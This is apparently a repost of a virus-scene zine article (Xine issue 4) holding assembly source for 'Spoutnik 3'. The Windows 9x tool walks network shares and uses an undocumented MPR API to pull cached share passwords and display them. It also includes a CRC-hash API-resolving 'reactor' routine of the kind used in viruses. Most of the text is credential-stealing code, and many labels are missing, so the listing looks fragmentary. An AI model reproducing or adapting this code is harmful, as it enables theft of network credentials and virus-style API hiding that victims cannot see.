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Xine - issue #4 - Phile 303

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 · 7 months ago

| Xine - issue #4 - Phile 303 |

; Spoutnik 3 was build in order to Hack the password and try to combine them
; to other ressource, even imagine viruses on networks that exchange their
; password list, this apps!Ikx call this undocumented API:
; WNetEnumCachedPasswords^Ikx:
; arg1 -> will be put on the stack when routine called
; arg2 -> the routine adress that will receive on ESP+4 the
; ressource name and the hacked password
; arg3 -> number of invocation
; arg4 -> set to zero (??? - Unknown)
; arg5 -> idem
; this is also a ring scanner, it can scan (theorically) all the sub entries of
; a network, this was specially boring to do this, the structure is kinda a
; boucle
; This apps doesn't work with that satanic os that bugs on all asm sources: NT
; it also(ikx) open a MesageBox with Domain Machine and Disk references...

.model flat

extrn WNetOpenEnumA:Proc
extrn WNetCloseEnum:Proc
extrn WNetEnumResourceA:Proc
extrn WNetAddConnection2A:Proc
extrn WNetCancelConnection2A:Proc
extrn LocalAlloc:Proc
extrn LocalFree:Proc
extrn LoadLibraryA:Proc
extrn MessageBoxA:Proc

extrn ExitProcess:Proc

.data ;the data area

LastAlloc: dd 0
AllocHandle: dd 0

Ressource1: db 'SPouTNiK III (Ikx) (A) Just-Do-It in asm !',0

Minimport: ; This is our light version of our
; import zone
db 'KERNEL32.' ; note the . finish the include
db 'MPR.' ;
db -1


dd 078a25f37h ; FreeLibrary
dd 0979bA034h ; WNetGetCachedPassword

db -1

type0: db ' Global Network: ',-1
type1: db ' Workgroup: ',-1
type2: db 10,13,' Machine: ',-1
type3: db ' Disk: ',-1
Type99: db ' $Password: ',-1

display: db 'Note: That program was originally develloped',10,13
db 'for Microsoft Network, Check that Global',10,13
db 'Network is already loaded',10,13,10,13
db 'No entry,',10,13
db 10,13
db 'StarZ3r0 (IKX) / (IkX) product (ikx) ',10,13,0

dd 8000h dup (?)

thatcompare: dd ?


FreeLibrary: dd ? ; invoked apis
GetCached: dd ?

displaypointer: dd ?

DaddyOffset: dd 20 dup (?)
DaddyOffset2: dd 20 dup (?)
DaddyOffset3: dd 20 dup (?)

.code ;executable code starts here

xor ebp,ebp
lea eax,[ebp+display]
mov dword ptr [ebp+displaypointer],eax
call networkscan ; call the scan routine

cmp dword ptr [ebp+displaypointer],offset display
je notnow
mov eax,dword ptr [ebp+displaypointer] ; detect if it
mov dword ptr [eax],0 ;something was detected
; else , then don't run
push 0
push offset Ressource1
push offset display
push 0
call MessageBoxA ; show the display

push 0
call ExitProcess ; quit


lea esi,Minimport
call initapi ; detect the MPR

lea eax,[ebp+Scansubnets] ; we create articially
push eax ; the 1st boucle

; pop ebx
; push ebx
push 4000h
push 0
call LocalAlloc ; allocate

mov dword ptr [AllocHandle],eax

push eax
xor ebx,ebx
xchg eax,ebx
call Globalconnection ; open connections...

pop eax
jmp Scansubnets0


call Checktype ; look for password

push ebx
call Globalconnection ; open connection
pop ebx
jc ReturnUp0

push ebx
push 4000h
push 0
call LocalAlloc ; allocate it
mov dword ptr [AllocHandle],eax
pop ebx


push eax
Call EnumResource ; look all ressources
pop eax
jc ReturnUp ; if no more then
; finish

push eax ebx
; lea ebx,[eax+12]
xchg ebx,eax
push dword ptr [ebp+AllocHandle]
call Scannets ; detect all sub entry
pop dword ptr [ebp+AllocHandle]
pop ebx eax

cmp dword ptr [ebx+20h],0
je ReturnUp ; if then , finish
add ebx,20h
jmp Scannets


mov eax,dword ptr [ebp+AllocHandle]
push dword ptr [eax]
call WNetCloseEnum ; close current Enumeration

mov eax,dword ptr [ebp+AllocHandle]
push eax
call LocalFree ; delocate it


cmp dword ptr [ebx+20h],0
je finishscan
add ebx,20h
jmp Scannets ; detect next entry in the
; buffer



push ebx
push eax
push large 3 ; fwdusage
push large 1 ; fwdtype , get only disks & subdirs
push large 2 ; fwdscope
call WNetOpenEnumA
add eax,-1


mov dword ptr [ebx+8],4000h
lea ecx,[ebx+8]
push ecx ; number of entries = 0FFFFFFFh

push eax

mov dword ptr [ebx+4],-1
lea ecx,[ebx+4]
push ecx ; number of entries = 0FFFFFFFh

push dword ptr [ebx] ; handle
Call WNetEnumResourceA
add eax,-1



cmp dword ptr [ebx+8],1
jne check2 ; if domain then write it on
; buffer
lea ecx,[type1]
mov edx,dword ptr [ebx+20]
call droptodisplay

jmp skipscan


cmp dword ptr [ebx+8],2 ; if machine, save it!
jne check3

lea ecx,[type2]
mov edx,dword ptr [ebx+20]
call droptodisplay

jmp skipscan


cmp dword ptr [ebx+4],1
jne skipscan


lea ecx,[type3] ; if disk
mov edx,dword ptr [ebx+20]

call droptodisplay ; notice it

mov al,byte ptr [ebx+12]
and al,1
cmp al,1 ; as share point, else , forgot
jne skipscan

cmp dword ptr [ebp+GetCached],0
je skipscan

lea eax,[ebx+20]
mov dword ptr [ebp+thatcompare],eax ; save the offset of ze
; name of ressources in memory
push 0
push 0
lea eax,[ebp+Ourcached]
push eax

push 0FFh
push 0
push 0

call dword ptr [ebp+GetCached] ; get hacking passwords

pop eax


push ebp
mov ebp,esp

lea esi,[ebp+8]
mov esi,[esi]
xor ecx,ecx
mov cx,word ptr [esi+02]
mov ebx,6900h ; signify we have the size of
mov bl,byte ptr [esi+04] ; the password
; this will be taken in account
; in drop
add esi,8

call getdel0
getdel0: pop ebp
sub ebp,offset getdel0 ; get ebp

mov edi,dword ptr [ebp+thatcompare]
mov edi,dword ptr [edi]
dec edi
inc edi
cmp byte ptr [edi],'\'
je thatsvino ; eliminate the \\
; the saved ressource have that
; followed by the password
dec esi
dec edi
inc ecx


dec ecx ; check if we have correct
inc esi ; password
inc edi ;

mov al,byte ptr [edi]
cmp al,0
je thendroptit

cmp byte ptr [esi],al
jne thenfinish0

jmp thenscannext0


cmp ecx,0
jne thenfinish0 ; check if it's really good
; name
lea ecx,[Type99]
mov edx,esi
call droptodisplay ; it's dropped


mov eax,1
pop ebp
ret 8 ; return


push ebp
call deltaone
pop ebp
sub ebp,offset deltaone ; it's done!

mov edi,dword ptr [ebp+displaypointer]

mov esi,ecx ; drop the ecx,-> spec
dec esi
dec edi


inc esi
inc edi

mov al,byte ptr [esi]
mov byte ptr [edi],al
cmp al,-1
jne drapdropit

mov esi,edx

cmp bh,69h ;drop the edx -> ressourcE/pass
jne drapdropit0 ; this cmp check if we have
; password size
push ecx
xor ecx,ecx
mov cl,bl
repz movsb ; then repz it
pop ecx

jmp drapdropto0

drapdropit0: ; else, then copy it
; until 0 found...
dec esi
dec edi


inc esi
inc edi

mov al,byte ptr [esi]
mov byte ptr [edi],al
cmp al,0
jne drapdropit10


mov word ptr [edi],0D0Ah ; drop end of line
inc edi
inc edi

mov dword ptr [ebp+displaypointer],edi

pop ebp

include include\reactor.asm

end HOST

- include\Reactor.asm - - - - - - - - - - - - - - - - - - - - - - - - - - - -

; Modified for Spoutnik III , reactor version 3c , look greenthumb for more
; informations...
; This is a multiDLL reactor, it comes from the version 2 of the reactor in
; arianne, hope you enjoy the code! This is version 3a coz it's specialy
; designed for DrGreenThumb.
; Version 3: Multiple DLL scanning
; PseudoImportZone(tm) created
; Minor changes, large instructions revised and redefined structure
; Version 2: Uses ZeroCRCs
; Only one loop used
; NT/95/98 compatible
; some bugs fixed, structure change, one loop
; Version 1: First prototype - Pretty small



mov ebx,esi
cmp byte ptr [esi],-1
jne scannext


inc esi
cmp byte ptr [esi-1],'.'
jne scannext

push esi

push dword ptr [esi]
push esi
mov dword ptr [esi],'lld'
push ebx
call LoadLibraryA

cmp eax,-1
jne itsokay1

pop esi


mov edi,eax
pop esi
pop dword ptr [esi]

mov ebx,dword ptr [edi+3Ch]
add ebx,edi ; ebx point to the PE header
; In fact it's allways PE
; I skiped the MZ and PE
; signature check coz if it's
; not, Kernel can't be loaded :]
mov esi,dword ptr [ebx+120] ; esi point to the Export
lea esi,[esi+edi] ; zone

mov ecx,dword ptr [esi+24] ; ecx = number of export
mov ebx,dword ptr [esi+32] ; ebx point to the name offset
add ebx,edi ; table
push ebp
lea ebp,[ebp+startapis-4]


mov edx,dword ptr [ebx] ; edi point to the 1st
add edx,edi ; name


mov eax,dword ptr [esi+24]
sub eax,ecx
shl eax,2
lea edx,[ebx+eax]
mov edx,[edx]
add edx,edi

push ecx
xor eax,eax
xor ecx,ecx

mov al,byte ptr [edx]


mov cl,byte ptr [edx]
test ecx,ecx
jz test_crcs
rol eax,3
xor eax,ecx
inc edx
jmp getnamecrc


pop ecx
inc edx


add ebp,4
cmp byte ptr [ebp],-1
je suither

cmp dword ptr [ebp],eax
jne testnext


mov ebx,dword ptr [esi+24]
sub ebx,ecx
shl ebx,1

add ebx,dword ptr [esi+36] ; table RVA
add ebx,edi ; Add Rva
xor eax,eax ; seems to be okie!
mov ax,word ptr [ebx] ;

shl eax,2

add eax,dword ptr [esi+28]
add eax,edi

mov eax,dword ptr [eax]
add eax,edi
dec ebx

add ebp,offset startlist-startapis
mov dword ptr [ebp],eax


loop loophere
pop ebp
pop esi

push edi
mov eax,dword ptr [ebp+FreeLibrary]
call eax
jmp dothatnow

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